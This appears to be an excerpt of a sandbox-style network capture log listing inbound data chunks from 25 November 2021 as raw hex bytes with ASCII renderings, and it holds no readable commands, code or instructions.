2021-11-25 15:51:20 UTC	21	IN	Data Raw: bd c2 92 b6 f0 08 5c e4 db dc dc 62 97 60 be 5a d6 03 0d 3d 58 90 b2 ff 31 84 68 4f 1f 44 ef 25 da b2 2c 34 ca bf 60 a5 c3 eb 95 06 8d 6f 12 40 d3 2e b0 c6 3f 9e 2f 7b a9 d3 07 dc 60 fe ff cd 8f 92 de 51 17 3b f4 da ae c7 13 be 0c 03 37 80 7e d9 14 fc 3c 4a 29 32 0b 19 c1 a8 d3 8c 69 5a 02 0d 1a 42 d4 0a a8 7c 4c a4 dc f3 d5 2b 99 31 80 96 75 c5 f2 c0 ed f3 d4 79 ec ae fb ec 85 46 d2 82 7d 7e 7a f6 24 70 4b bb d9 29 a1 a0 78 15 3e 2b af a9 a2 16 75 eb f1 63 e9 02 f2 ec 68 10 59 68 b0 4a 70 55 46 e4 38 0e 63 59 7d 38 01 3d 41 2f 75 e2 4e c0 63 4f 90 91 e8 7f 32 19 5c 33 83 03 25 55 e8 9d 50 e7 5c 7e a4 14 5b 1c 76 d8 e5 4a 57 6f 13 6d 04 45 c4 fa 9c c8 7c 4a f5 93 ad c2 c6 0a 41 a2 0e df 30 79 d9 2c 28 1a da f7 4e 61 0a 9f 05 38 d4 55 4e 61 e8 92 12 2a 1b Data Ascii: \b`Z=X1hOD%,4`o@.?/{`Q;7~<J)2iZB\|L+1uyF}~z$pK)x>+uchYhJpUF8cY}8=A/uNcO2\3%UP\~[vJWomE\|JA0y,(Na8UNa*
2021-11-25 15:51:20 UTC	22	IN	Data Raw: da b5 86 7c ec 0c 0a a2 39 47 b6 69 33 64 81 91 73 d9 c0 e5 69 06 a6 c2 bf d4 ac 30 04 ad a4 57 d6 a8 74 a2 0c 40 07 91 97 24 5f 09 c2 bb d9 2b 3c 17 7c a7 5e e7 d2 5b b1 42 e3 c6 03 02 58 d1 20 89 42 d2 b4 f1 50 f9 21 e1 da 44 70 a4 24 53 dc 57 ca 89 85 07 86 45 52 c2 29 95 27 e7 a0 d3 99 89 e4 4b d4 98 8e 21 fd 70 17 f1 d1 36 97 b5 dc 66 97 69 c9 ba fe bd 63 6b c4 7a f8 17 70 93 88 86 5b 81 c8 7c 7a 4d b0 bb de 6d 82 7e 57 99 f4 b2 f3 55 52 e7 28 0d 96 3d 1a 76 3d 58 f5 28 20 dd e7 d5 dc 37 24 67 89 d1 2e f8 02 0b 13 7e 7c 20 8b 8e a5 ab e1 c8 ed 02 a4 85 fb 2a 1a ec 9d 53 69 94 fe 73 8d e4 71 27 a5 19 38 0b 25 4f 72 1f cc 7f 2f 34 3f a7 a9 cd 8a 34 9e da 97 8e bc ec 9b 33 c0 74 4a 26 d0 b2 c8 8f 1b b1 0b a0 07 08 50 09 91 a5 a5 aa 4a 4c 91 d4 f3 ed fe Data Ascii: \|9Gi3dsi0Wt@$_+<\|^[BX BP!Dp$SWER)'K!p6fickzp[\|zMm~WUR(=v=X( 7$g.~\| *Sisq'8%Or/4?43tJ&PJL
2021-11-25 15:51:20 UTC	24	IN	Data Raw: 1b c9 fe e1 ca b4 c1 1c 86 94 21 d0 83 f5 2b ac 43 d9 73 c2 c2 9c 00 73 d3 3c c5 05 a0 8e 80 51 c2 35 07 38 83 cd 88 f8 f4 e1 ca 87 c7 14 0e ee 29 a6 2d 3b 9d 41 d8 f8 f5 6e 94 3a 0b 24 ec 8e f4 00 8e 25 d2 20 1f 0e 02 28 aa 2c e5 dd 2f cd 91 de 02 7b aa 2c 48 d5 bc 9d f4 73 c2 d5 8f 8c da a1 ca 79 cf 9f 27 fd 41 3e da f7 08 46 56 0f bc 01 5d 63 a4 1a 2f 90 ff df 52 a8 32 37 a0 db 99 1d 87 43 29 84 92 6b a5 ae 5c 77 cc 62 86 63 5d e2 4f 1d 0b 20 84 c9 1a 70 e2 f1 03 07 06 01 06 50 03 2d 19 3c 0a ff bb 60 9b 33 dc e7 25 ef d9 8c 6f df 2b c0 6c 48 ab 1c 76 58 d8 23 af c8 6f 53 70 5c 80 82 e5 46 43 a2 7b 5a f8 b3 73 ba d7 cf e3 80 99 74 19 41 ba a2 c4 cd 30 95 72 14 5f f0 95 b0 f0 54 ff 11 1b c1 a5 9d 38 c6 3e 2d 61 ac ac ef cc 72 4e c0 79 31 70 95 b4 f7 9f Data Ascii: !+Css<Q58)-;An:$% (,/{,Hsy'A>FV]c/R27C)k\wbc]O pP-<`3%o+lHvX#oSp\FC{ZstA0r_T8>-arNy1p
2021-11-25 15:51:20 UTC	25	IN	Data Raw: a3 cd 05 bd 37 df 3f ac dd 69 3c 81 6f cb e9 b2 ca 8a 5e 1e e2 0c 7f 89 d7 1f 40 15 66 13 3f b0 90 fd b7 76 de d4 fe d6 fe 3c 2e eb 95 5a 18 58 51 74 21 7a 3c 21 e7 c7 2b 1a a4 60 1d ef 6a 2f 45 48 45 a6 77 41 37 3b 76 40 ac 28 5d 86 6f 80 e7 28 61 81 22 c4 4a 2d 22 cc c8 15 ca da 3c ce ef 05 7f 4e 71 da 0d 16 b1 2a a4 a3 2c 1c 96 36 c2 c6 ae f9 97 6e b1 0e a5 aa e6 41 ce 56 c4 da 5f 1b fc 00 6f 7e 7e 46 e6 b2 2d 5c 9a 07 db c3 12 52 ce 5e 66 18 48 f2 8a 02 b5 42 d4 30 f5 2c 1b 4a fe ad c1 8f 19 96 71 6e a1 a1 49 2f b3 ae d6 01 ca 75 36 9a 99 09 1c 90 e6 c5 2e 07 36 c6 67 d9 a1 29 7a b9 d8 94 30 03 67 ea 78 60 93 6b 29 ad a0 5c 2b 07 a4 a1 ea cf 03 35 be 10 46 e7 35 a2 92 1b 67 92 09 d5 54 14 58 e1 f3 9d ba fb 03 d4 e0 c5 02 6d 3d 35 12 d7 b2 4c 9a e8 24 Data Ascii: 7?i<o^@f?v<.ZXQt!z<!+`j/EHEwA7;v@(]o(a"J-"<Nq*,6nAV_o~~F-\R^fHB0,JqnI/u6.6g)z0gx`k)\+5F5gTXm=5L$
2021-11-25 15:51:20 UTC	26	IN	Data Raw: ff 87 1f 10 45 2a 2e 0b df cb 3c d5 d7 2e 83 02 9c 87 fc 30 04 36 95 2d 16 77 f8 85 6a 20 83 b2 53 6a a0 1a 40 b2 2c 52 18 b7 49 f2 9d 17 44 d1 3f 50 0e 68 ba c7 eb 00 06 4c f1 e3 f4 11 2a bd d9 dc 52 cf 3e 2b 4d ec d6 3d 54 4f 46 29 ff 08 34 07 0a d6 05 09 b7 38 ad 5f 13 ed 16 2c 11 4c 50 e1 3e c0 78 c1 f6 a9 60 68 4b 74 67 18 a5 b2 70 33 6c 27 dd 22 bb 52 4e cb d0 50 e8 49 8b fc ab 58 ab 6e 42 e2 99 61 de b4 04 03 33 ba 59 af b7 40 d1 30 0b 8b 6b dc b5 8f 58 e9 f9 94 17 32 37 b9 fb 8e 25 5f 22 9f 39 85 45 52 7e c7 9a 42 5e 92 17 ff 6c d5 14 c7 88 f7 f0 da 3c f1 65 fd 90 0b 38 f2 9b 39 5d 44 31 72 a7 46 56 6f c1 55 df 5d e8 b8 78 bf 62 b5 d4 2e c4 94 99 8d e8 d3 35 0d 21 76 a8 05 3e be 74 fe 81 fd b4 f0 9b a3 a4 a8 cc 9f d8 21 09 76 ab 19 18 71 12 55 ce Data Ascii: E.<.06-wj Sj@,RID?PhLR>+M=TOF)48_,LP>x`hKtgp3l'"RNPIXnBa3Y@0kX27%_"9ER~B^l<e89]D1rFVoU]xb.5!v>t!vqU
2021-11-25 15:51:20 UTC	28	IN	Data Raw: 0e 39 ed 77 1a 75 80 7f 7b 05 5b 64 ec a2 62 16 aa e3 21 98 79 fc 7e 42 42 11 e0 a3 c2 6a 9b 80 fc fe b4 5c 24 37 fe 18 0b 50 c8 3d 06 b9 43 9a 4a 2c f1 13 bf 7b 7c 93 9b 97 45 50 85 36 17 f1 88 4a 19 44 cc 44 0b 05 d3 23 2a 03 fc 64 67 24 3c 4b 4c ea cf ae a3 91 7b 7a d3 40 cd aa 3c d4 94 88 f8 02 62 b3 fa 85 a5 88 53 60 61 6b 7d 4a 32 14 d7 a0 d7 f8 7e d0 07 8d c1 5a d9 d3 d4 f9 a4 48 42 61 d4 f8 34 14 63 64 1e a8 fe cb ef c4 c6 03 29 ba 61 a2 ec 1e e6 2f 92 17 fd 35 4b 89 60 82 e1 e5 c8 ff 9d 10 c9 45 18 b4 7a 86 7b b5 1d eb 5f 83 e3 40 c7 13 ae fe 3a 58 e0 82 88 3e 43 7a 05 0e 42 f4 3e cc 71 ea e0 1d 73 a7 c2 ee b6 ac 46 d3 fb 22 59 3a eb 14 bf e9 93 ff 3e ea 93 94 86 45 8c 86 db 3b 4a 04 1b 06 a2 b6 82 42 42 3e da 65 b4 ce 5e 76 e5 06 01 ea 24 5d 53 Data Ascii: 9wu{[db!y~BBj\$7P=CJ,{\|EP6JDD#*dg$<KL{z@<bS`ak}J2~ZHBa4cd)a/5K`Ez{_@:X>CzB>qsF"Y:>E;JBB>e^v$]S
2021-11-25 15:51:20 UTC	29	IN	Data Raw: ee 9c 98 dc 52 5d d9 d4 18 9b 8b 53 b5 9b 14 94 32 a2 a3 54 44 09 15 6d a5 5c 2c ca 8a db 40 d9 92 c5 20 c0 9e d0 15 16 4c 63 37 d5 11 a8 de 5d 96 1c b0 dc de 36 cb 07 0f 75 26 d1 5b b4 ed 5a d7 88 3f 33 68 f7 60 cf 49 4b 7c 4e 78 c5 9d 14 74 a5 92 12 a5 4e 77 db d8 9f 0c a7 3b bb 8b 6d 05 33 bc e2 79 ea 44 86 64 50 c4 99 78 f2 62 68 00 b0 2b 82 73 64 ff 4a c8 81 2f 76 d3 87 ff 99 86 45 52 fb 09 ae 50 12 1a c9 1a fe aa 45 1a bf f8 20 4b cc 22 69 65 51 a1 91 98 ff 7d 0f 66 8d 5f 13 52 7f 95 a5 bb 57 69 c8 b5 88 07 a4 df d2 14 df 5a b3 e9 29 97 86 9e 06 2c 17 f6 16 d0 2a e5 8b ad 20 12 5b 23 0b 46 e4 b7 14 f0 a6 b3 c7 59 19 0c af 75 32 62 85 02 a8 75 1c 9d 48 fe e7 2f b8 66 07 b0 89 f1 20 75 e2 ab 31 8a 3b 68 6a 81 c2 78 b4 6d 64 3f 02 b0 c7 cf a6 11 33 16 Data Ascii: R]S2TDm\,@ Lc7]6u&[Z?3h`IK\|NxtNw;m3yDdPxbh+sdJ/vERPE K"ieQ}f_RWiZ),* [#FYu2buH/f u1;hjxmd?3
2021-11-25 15:51:20 UTC	30	IN	Data Raw: 83 da 79 ee 60 70 be e0 b8 b4 ae 4b 97 b2 c5 e4 b4 36 0c 92 22 6a 37 af 5d 74 25 00 cc 61 43 9b 23 5a 3d 44 30 12 f9 a4 b5 16 ab 3a 0c e2 6a 6e 92 1a a9 a6 3a 88 51 e0 18 ef 3d ab 63 f2 d4 a0 d1 a8 b8 77 30 11 59 e7 8a 87 26 6a ba 5f 49 58 a5 c2 33 be 47 54 77 4f 39 4a d1 09 28 e4 0a 4b 52 3f 47 5c 28 ce 3d 56 49 4a 61 34 a1 a9 f7 a0 3c 24 6f be eb ae 29 f7 3a a6 a5 15 ca 37 8e 4e ef 69 3f 93 ed 97 93 73 42 e6 ba 0a 98 6d a6 95 b2 2d 93 9e a6 26 2d 0e c6 63 42 4a d1 4d 82 ae 26 a9 11 17 4d 76 ad 8d e1 4c 46 20 2e e5 97 fe 0f e1 c1 8f 19 56 27 fc bf 14 68 84 77 48 3e da df 25 08 37 83 c0 d7 c8 75 52 fc 0e 59 e8 3a 0b f9 9e 3f 41 e3 51 8e f4 2a 11 eb c1 fb 3a 34 83 6e e9 29 99 bc e4 a5 b1 c2 da 04 7c 4d 4d be cd 49 49 70 9d 59 13 e5 cb e1 f6 21 fc f5 0b 28 Data Ascii: y`pK6"j7]t%aC#Z=D0:jn:Q=cw0Y&j_IX3GTwO9J(KR?G\(=VIJa4<$o):7Ni?sBm-&-cBJM&MvLF .V'hwH>%7uRY:?AQ*:4n)\|MMIIpY!(
2021-11-25 15:51:20 UTC	31	IN	Data Raw: c0 5b 28 e2 b8 68 36 d5 44 d9 ad ca 1b ac a7 96 3f a3 48 d4 31 74 45 03 0e 51 7e a8 c8 23 e1 20 92 19 3f b2 47 c5 8d 0b 77 54 91 15 53 b1 2b 1b 00 c1 9c 5e de d5 9d 4a 4f 96 08 8a a9 84 19 3d 7c c0 1c 37 4b 08 12 66 80 75 56 7e a8 63 0b d8 4f 3b 29 0c 67 4b 00 ba f9 ac dc b9 67 02 5e f7 93 7f 27 e7 c1 2a 8e e1 3c c9 36 3d a6 ab b5 ed ba 7d 8b ad 50 f8 23 0a 15 f0 92 77 dc a8 63 c3 27 08 5f 7d f2 66 bc 5f 26 6a 83 f5 0d 70 48 1d c3 1b 0f 26 76 5b 19 f4 97 60 b9 12 6b 3b ac 56 ae 82 ad 69 33 79 36 1b fe 3f 92 86 dc e7 7b ba 67 55 db b8 fb 80 a4 43 cc 6f 34 33 65 3c 13 e7 c0 1c 96 93 68 b1 df e1 24 21 e0 52 fe c5 4a 72 68 87 cf 35 4c 39 d5 1e 76 6d a1 2c e1 e3 d6 ad 6e a0 74 4f bd 16 49 b5 50 de 64 8c 5b e4 a1 80 d6 5a 13 83 73 cd 91 e1 74 61 3d a0 32 f6 97 Data Ascii: [(h6D?H1tEQ~# ?GwTS+^JO=\|7KfuV~cO;)gKg^'*<6=}P#wc'_}f_&jpH&v[`k;Vi3y6?{gUCo43e<h$!RJrh5L9vm,ntOIPd[Zsta=2
2021-11-25 15:51:20 UTC	33	IN	Data Raw: 10 c3 92 6b 35 50 03 3a dc 32 31 85 fe f5 2f 8c 8f 59 63 75 3e bb 63 35 bf 9e b9 4d af a9 6c 5a 51 e2 40 97 b9 80 a9 54 51 4b df 5c 00 cd 7a 68 c1 1c 99 93 ab d4 3a b2 3d ec e5 a3 59 38 bb 52 f5 d1 bf 58 1b bf 8f 53 f5 73 7f 3b eb 7f f8 19 fa 9b 4d f4 1c e1 82 5c 12 5b 16 f4 38 04 bb 65 ed 14 63 39 b6 c4 28 2b 1f eb 0d 19 f0 69 34 3d a6 1c 7f 91 b9 a1 a6 18 ad b5 73 24 61 33 65 61 9f 25 1a a6 9a 32 0b 2e 41 43 3e 24 63 e8 6e 35 46 b5 73 c6 29 a1 93 a5 ee 0e d7 25 d8 c3 1e 74 9e 38 ed 0d 27 0b 0b 28 18 4f 40 ad 5d 04 29 64 60 90 1a 4e fa 5e 80 26 60 99 61 1c 47 ab 30 04 5c 74 9a 3c 1b 75 7c 9f 5c 7c 25 4f 7f 48 db 2f ec 49 44 da 9a 49 85 32 07 04 42 33 9f 56 88 e7 28 f4 2c 2b 9b bc 70 2c f5 7d 76 6a 86 7a 0d 27 df e2 4d e0 50 7c b5 16 c2 a9 65 0b 63 d9 f6 Data Ascii: k5P:21/Ycu>c5MlZQ@TQK\zh:=Y8RXSs;M\[8ec9(+i4=s$a3ea%2.AC>$cn5Fs)%t8'(O@])d`N^&`aG0\t<u\|\\|%OH/IDI2B3V(,+p,}vjz'MP\|ec
2021-11-25 15:51:20 UTC	34	IN	Data Raw: ea e6 7c 43 f0 a9 a3 53 15 73 18 c6 8b 03 3d 76 62 8c 56 8f 7a 40 24 35 c5 8b e1 c8 72 20 17 75 e8 fa 5a 5e 46 d3 3b 5d ab 52 06 4c d5 a0 d9 ca 12 c6 d8 50 6e a1 a5 53 63 d0 49 a0 a2 23 eb c3 e8 64 33 10 a8 50 c8 44 cd fe e4 22 12 5a ed 62 10 b4 8c f3 e1 f6 26 3d 16 8d dc 55 9e 27 e6 8e 7d 4a 21 6c 8a e9 1f 00 e6 4d 7d cd 84 dc a8 2e 5e a6 24 67 4f a7 64 87 f3 07 21 d2 59 d7 1c 43 ff 57 97 39 b4 11 ea c9 ca 71 cc 9b b6 c5 1a c2 dd a7 0e 5e ad bf 72 a0 de 6b e0 e3 7c ac a4 46 da a5 a3 3f e3 22 c7 1d f0 8e f7 90 18 df 25 18 58 d2 b5 4b d4 29 cf de d9 27 de b4 ef d6 7d a4 a5 5b 52 7c 2a 55 64 72 f4 4f 2e f9 71 e4 6b ba 0d 6a 4a 87 c2 96 09 1c f7 0d 90 15 f7 a4 10 bc 10 60 ed f1 e9 51 74 2c 02 5d 17 f4 11 d4 95 c4 8c e9 f9 a6 ec 3e 79 d9 a9 53 7c da 11 ec 34 Data Ascii: \|CSs=vbVz@$5r uZ^F;]RLPnScI#d3PD"Zb&=U'}J!lM}.^$gOd!YCW9q^rk\|F?"%XK)'}[R\|*UdrO.qkjJ`Qt,]>yS\|4
2021-11-25 15:51:20 UTC	36	IN	Data Raw: b3 10 1c e6 74 a7 42 c7 dd 26 02 5b 61 00 8e f9 b8 2d ae c7 25 dc 52 e9 62 14 04 cd bc 94 31 6a d9 11 37 d0 0a 3d 4d a2 1e c7 2a 22 65 16 42 45 18 b2 63 07 39 5a 84 4c 2b ff 24 26 9b 47 4c c5 f2 5c 95 39 d5 c9 b7 7d 21 0f d7 a4 c0 19 2a 10 51 4c 44 17 8f 16 fb 7f ea 59 58 dc 6d 7c a6 dc 55 65 ec 16 77 37 d1 97 5a 04 52 f1 14 37 01 0f 56 76 10 4e ff 8a 55 8c 03 00 13 54 b5 88 2c 1a 42 2b 8a 5c 04 3b b5 42 e6 75 db 4f 9d f9 16 53 e8 f1 2b ff 0d ce f1 73 35 a9 a9 b9 19 35 db 41 a4 91 04 27 8a 0f 54 0a e0 ad 1c be 99 81 c5 98 86 8c c1 1e a6 6f f4 7b 1d fb b1 ac 0b 1a 3e 24 db 8f 95 8e 29 75 3f fd 74 44 8e e1 30 55 98 f4 46 34 e1 8c 97 79 d2 54 15 c5 af bc 16 44 29 67 6c 42 3b cc 6f c5 03 df 2f d7 db 2d ca 39 57 9c 6c 4a 32 48 2f 64 a2 de bc 86 8c 83 99 76 a9 Data Ascii: tB&[a-%Rb1j7=M"eBEc9ZL+$&GL\9}!QLDYXm\|Uew7ZR7VvNUT,B+\;BuOS+s55A'To{>$)u?tD0UF4yTD)glB;o/-9WlJ2H/dv
2021-11-25 15:51:20 UTC	37	IN	Data Raw: 1d 9a 9b 42 86 f2 0c d5 c8 b6 ad 5b 6c 23 00 cb e8 98 32 ca 97 60 62 09 c2 73 a5 56 06 33 ef eb fb 57 92 b6 e9 3a 06 57 16 5d 4c df 09 1a 76 17 d4 d2 a3 7f cd a7 31 58 e8 65 db e0 1c 24 2f 9c d3 d0 39 51 94 b2 52 ea 23 a3 c6 13 a9 dc bb 2c ff cf c9 07 3f ad df 49 ab e2 7d 55 bb 0f 2f 72 26 1c 1a cc 8d ee 09 fd e2 0f ee 61 5a d2 a6 8a 63 12 1b f3 eb b7 7e 29 27 d9 48 87 cf 32 51 45 4a 6d 04 53 0b c4 86 78 6e 93 9b a5 37 b2 d8 e6 47 6a ff b6 ec d7 19 a4 70 9d 8e 5c af 2c a5 9e 22 3c 2f 8e 40 25 8e ba f0 86 06 59 0a a0 3e 2b a4 3c ba f6 72 ff 85 f8 58 d7 33 37 8d fd c9 0d 17 8e 21 89 4b 39 dd 96 08 99 d3 3e 4e 42 d1 c4 ee 8e 0e 5a ee 6b 00 a2 b2 f2 0e 1c 4d 77 95 b8 e6 e3 c8 95 d8 aa ed bc 94 69 8e 23 f1 ab 50 c1 49 ab 22 86 13 ee 6d 38 c1 7f cd f1 fe 01 ea Data Ascii: B[l#2`bsV3W:W]Lv1Xe$/9QR#,?I}U/r&aZc~)'H2QEJmSxn7Gjp\,"</@%Y>+<rX37!K9>NBZkMwi#PI"m8
2021-11-25 15:51:20 UTC	38	IN	Data Raw: ca 76 f8 21 10 c9 07 7c b1 f9 a9 50 bc 01 fd b6 fc 66 68 4e c9 e4 bf 67 39 ac 32 eb fb 72 49 7f ce 5e 95 78 cb f2 ce bc 0f 2b ac b2 30 8e 24 6a b5 44 58 71 bc 16 10 dd b0 53 e7 d3 be bd 16 18 75 6f a9 8a f4 ff de d2 2b 69 8a 67 e4 ac 4a 4c a1 5e 59 f5 70 c7 1d f3 d8 aa d9 99 07 d5 1c b6 09 c9 94 ba 35 a6 e7 ce b6 fd 42 85 31 ed 5e 01 e7 6b ee 51 97 19 08 21 d7 88 fd 72 55 f4 d7 33 25 d1 b1 02 01 00 8c 60 b2 0e 53 4b 47 ab 34 07 ef 1c ec d7 f1 07 ca 17 2f 0b 17 51 7d 68 2d 5e 7c c1 ae 97 d4 2d f8 c8 b0 c7 2d 59 78 f6 98 d9 79 3f 45 5a 08 32 d7 b7 42 7e d6 52 12 c6 51 64 2b 92 21 84 97 10 68 a1 29 05 04 a3 50 7d 29 7a c4 9e 2d 67 8e ea fe 90 27 f6 93 14 b5 8d 63 01 63 f6 99 6a 47 c0 d5 30 e0 d6 54 7e db e8 1b 72 3f 35 5a 1e fb 6b cb 83 04 34 9a 40 1b cc ba Data Ascii: v!\|PfhNg92rI^x+0$jDXqSuo+igJL^Yp5B1^kQ!rU3%`SKG4/Q}h-^\|--Yxy?EZ2B~RQd+!h)P})z-g'ccjG0T~r?5Zk4@
2021-11-25 15:51:20 UTC	40	IN	Data Raw: 7a c9 02 bf 52 f0 67 61 db e4 4e e4 a8 d1 0a a6 22 63 0e 0a ad 0b 4a 88 68 87 ed 00 be df c5 d5 1b f3 c2 0c 98 02 d6 80 d0 be dc 56 e9 c1 79 37 b8 c2 99 bd 65 16 14 56 fe 55 66 88 7f 30 f9 ae fc 1d 72 91 ac c1 34 94 35 be ef d0 8d fc d4 a9 4e b5 02 8c 49 70 ad 6b 3b ac 36 2d a9 b1 d2 b1 b6 92 1d 18 f7 e2 cb ff 84 75 62 23 e5 a2 bf 69 d0 5c 18 49 48 f5 9e 0f cd 33 70 d8 22 5a e6 75 db ea 21 8a 3a 05 0b 72 99 96 e0 5c 66 72 a9 50 41 e4 41 37 6e ac 38 59 57 56 e9 c4 98 3a 53 ab 29 7c b9 4e f3 de 52 cd 1f a8 d4 cb 43 61 33 94 e1 4f 8e f3 e8 4e 54 67 06 df 44 ef e4 56 08 a4 c2 66 02 b3 42 d3 0d 40 6f 14 6c 51 7a 5e 94 34 03 cd f1 1a 79 2b 70 a9 54 b6 13 94 36 eb 96 85 e2 7d c7 9b 5b 45 d0 d9 7b c8 16 da 51 30 97 73 85 fc cb 1a ae f6 ba 08 40 cf 0b c1 9a 3a ca Data Ascii: zRgaN"cJhVy7eVUf0r45NIpk;6-ub#i\IH3p"Zu!:r\frPAA7n8YWV:S)\|NRCa3ONTgDVfB@olQz^4y+pT6}[E{Q0s@:
2021-11-25 15:51:20 UTC	41	IN	Data Raw: 23 f6 28 82 9d 5d 2a 50 58 dd d2 8d 0e 38 32 03 2e b1 bb 53 93 c2 30 c2 74 29 ac 69 04 5f f6 16 db 59 3f 4a c8 b5 79 22 84 4a 30 98 d8 48 ae fc 89 aa 36 08 af 76 bd 9f b1 d6 f6 cb 04 80 44 22 74 9e 0f b9 d2 52 cc 09 a5 29 7e 1c f9 f3 d8 a1 06 05 aa 3c 7e bc 1a 48 2f d5 1e 87 9c 9c 0d df 97 0b 43 e2 74 9a 01 35 33 7d 23 e4 c3 54 6d a9 53 49 a3 54 cb e4 54 c7 eb 90 aa 01 ad 68 b2 f3 e6 c5 ec 8a 34 80 17 f2 e6 4f 72 4b ab 61 eb 65 44 5c 61 f3 df 5a 4c f3 69 66 28 5d 11 d0 6d 24 85 e0 c8 68 df d2 9b a0 de 42 22 3b 3a 2a e8 9d 8f 37 b7 80 ca be 64 32 0f 54 b6 77 8f 9e 3a e7 d8 5e f5 96 f1 83 fd b9 18 a6 44 25 a7 20 66 4e f3 1d 65 e5 9f 5b f6 17 3c 7e 73 bf 9f 13 52 70 26 84 91 da 23 ab 74 30 0b 1c 9a 81 f6 91 0c 5e 71 18 d2 e9 da 33 85 f2 99 70 91 78 af 4d cd Data Ascii: #(]PX82.S0t)i_Y?Jy"J0H6vD"tR)~<~H/Ct53}#TmSITTh4OrKaeD\aZLif(]m$hB";:7d2Tw:^D% fNe[<~sRp&#t0^q3pxM
2021-11-25 15:51:20 UTC	42	IN	Data Raw: 5e 77 f4 1a 7b c3 89 69 7e 1b b1 71 22 f8 96 fb 73 dd ea 79 e5 57 ed a5 fe 3c 2e 30 e1 2f aa e4 49 48 38 2a dd 2d 8e a7 df 09 ef 44 da 40 c3 d1 1b c7 1d fb 79 32 62 25 b3 a0 20 b6 8d da 99 b5 f5 c3 08 a3 94 00 70 b7 7a cd e9 de ab 5d 1a 7a db 5a b1 5a d7 17 f3 11 3e ce 5c 96 0f da 55 7f fb 15 88 7b cf 0b 2e f4 f2 94 32 3c 1a cc dd fe 0b 18 49 b3 ca fc e1 82 fb 89 ee 27 21 a8 d4 93 19 32 f7 66 b0 ce 89 7c a4 d4 80 d6 ed da a2 23 e6 a5 39 83 6b 76 cf 08 97 be 00 68 cd 9d 40 c9 f2 63 35 b2 42 5a b0 64 82 46 d0 55 f7 a9 a0 53 bb b6 fd 71 76 fb 0e be 00 be 01 66 6a b4 fd bf 84 3c f2 0d d0 5e 90 fd bf 1b 9b b9 ec 26 ab 51 7a 5f f2 00 b1 ab 4e 54 61 f2 51 a5 01 3c 29 ac ce 22 ef a3 0c a6 2d 92 f1 f7 ad be f3 48 96 b9 80 41 a3 48 fa bd 9c 09 e7 34 f2 73 26 a8 d6 Data Ascii: ^w{i~q"syW<.0/IH8*-D@y2b% pz]zZZ>\U{.2<I'!2f\|#9kvh@c5BZdFUSqvfj<^&Qz_NTaQ<)"-HAH4s&
2021-11-25 15:51:20 UTC	44	IN	Data Raw: b8 c3 4e 8c 9b b1 79 3e 47 66 63 62 86 91 a9 53 70 a6 dd 34 4c f8 2f ba 12 a5 d8 a9 5e 91 1c fd c3 d6 a9 52 f6 e3 d0 be 03 28 12 a2 70 a9 6c 89 03 4b 8b df d6 95 0f 34 e4 37 b1 44 e3 5a 0f 21 6e 9d 84 42 45 db 83 d6 f9 96 0c 51 65 36 d8 45 d4 a7 96 0f 04 ae c6 66 9f 8c 67 37 35 f8 9b b9 4d 42 27 c1 9b b3 79 dd 3f 58 66 8a 54 f4 87 7e d2 4b bf 81 1e 97 02 b9 49 46 40 a6 a4 67 31 c1 17 f7 1c 8d 73 7d 50 1e fb 77 38 72 ae f1 e5 49 a3 53 3b 39 32 8f 6c 37 f7 69 b9 27 b7 d2 7b c8 bb 87 e0 99 68 a7 05 ae 23 0a 28 16 7d cc 0c 27 bc eb c2 ab 52 0c bb 58 79 59 99 cc 1c 6d db 3a a9 55 6e 94 b9 bb fa a7 96 f0 96 44 da 97 8e 9d 59 91 cd 82 f3 64 60 b4 8a 59 66 bd ee eb 60 02 e3 a9 1b c3 14 ab 72 31 8f a3 a5 47 44 16 a8 bd d6 98 81 6c fc 15 f5 a6 15 27 88 51 f9 10 bb Data Ascii: Ny>GfcbSp4L/^R(plK47DZ!nBEQe6Efg75MB'y?XfT~KIF@g1s}Pw8rIS;92l7i'{h#(}'RXyYm:UnDYd`Yf`r1GDl'Q
2021-11-25 15:51:20 UTC	45	IN	Data Raw: 0e 5e 67 b8 77 dd 66 b6 4e 08 98 0d 2a 90 5b be 34 03 0c 4c a5 94 a2 33 84 4f 78 a5 5c 88 57 66 bc 65 96 4f 61 09 11 d8 43 d8 41 a8 8d 70 5b f5 f4 87 1c e3 84 cc 4f 47 6b 49 ac 53 44 5f 9d 46 56 b1 55 94 6c b4 c9 0a a7 9d b4 c2 88 8f 8d 64 86 7d c3 ea f4 42 2d 12 0a 58 64 c4 61 97 ce 52 62 c7 55 3a 69 00 fd 64 9d 24 8d 80 44 37 87 c7 25 dc a9 cf 30 d4 30 93 ed 13 cf 3f 9a 0e b5 80 40 a0 87 f6 fe f1 d6 3b 0d a8 49 d6 e7 f0 33 8c 6b df b1 d0 73 aa de 6a 56 9e 3e 18 4f 8f 26 e0 8f 1f f3 9d 58 82 02 83 f9 61 a0 a8 03 30 eb 97 b1 45 59 b3 61 47 55 56 dc f3 32 e4 be e6 f3 e5 46 66 8f 74 22 2f 15 2d e2 10 25 dc 67 9a 8f 06 4a 38 07 ae 5d 94 99 67 8f 9a 61 fd c8 b7 89 8e 24 20 d8 e7 fb b9 99 eb 27 00 e4 e8 72 4d b9 ed 3a 27 4f 70 4a 23 ef 11 d6 56 77 e4 de c1 5a Data Ascii: ^gwfN*[4L3Ox\WfeOaCAp[OGkISD_FVUld}B-XdaRbU:id$D7%00?@;I3ksjV>O&Xa0EYaGUV2Fft"/-%gJ8]ga$ 'rM:'OpJ#VwZ
2021-11-25 15:51:20 UTC	46	IN	Data Raw: e5 fb 82 e6 12 52 cc 87 c7 04 30 37 b7 46 66 19 79 1e c5 e5 2f 71 72 a3 a3 96 42 9a 4f 46 e5 25 92 5e 9d bc ed 04 aa 19 46 ec 12 5e c9 59 3c 25 d0 16 4f dd e4 ea 8d 89 0b 64 b2 c6 ad 14 38 6f 17 c6 a1 bd 09 cf 5f 21 6a 43 a5 ff 86 44 de d5 62 e3 91 e8 7e a8 ff 70 e4 74 a5 9b 59 04 bd fd d7 9d 8c 5e 99 7a b2 9d b8 ca 87 6c f5 e6 0d 23 d0 57 7e 4a 2c f7 98 00 1a a1 d8 e7 bf 61 09 be 0c 4b 00 88 62 8f 1b b1 b7 31 b2 fd 77 2a e6 18 7f cb 06 52 95 b2 57 2d 72 ee 54 ff 32 3c 9a 34 fd a7 f8 2d ab 60 18 d8 eb 3b ed f7 a2 c4 37 87 75 9d 32 52 fd b6 1d 9e be e3 df 46 20 83 bb 5b 10 65 8f 10 1f 05 7e 7d c6 76 a6 df 93 a3 ae f6 ea 1d f2 ef b1 bd 26 6b 31 78 d3 39 36 7e 98 46 e4 4f 8d f2 61 07 2b 11 31 6d 04 24 91 7c 1d f2 5b 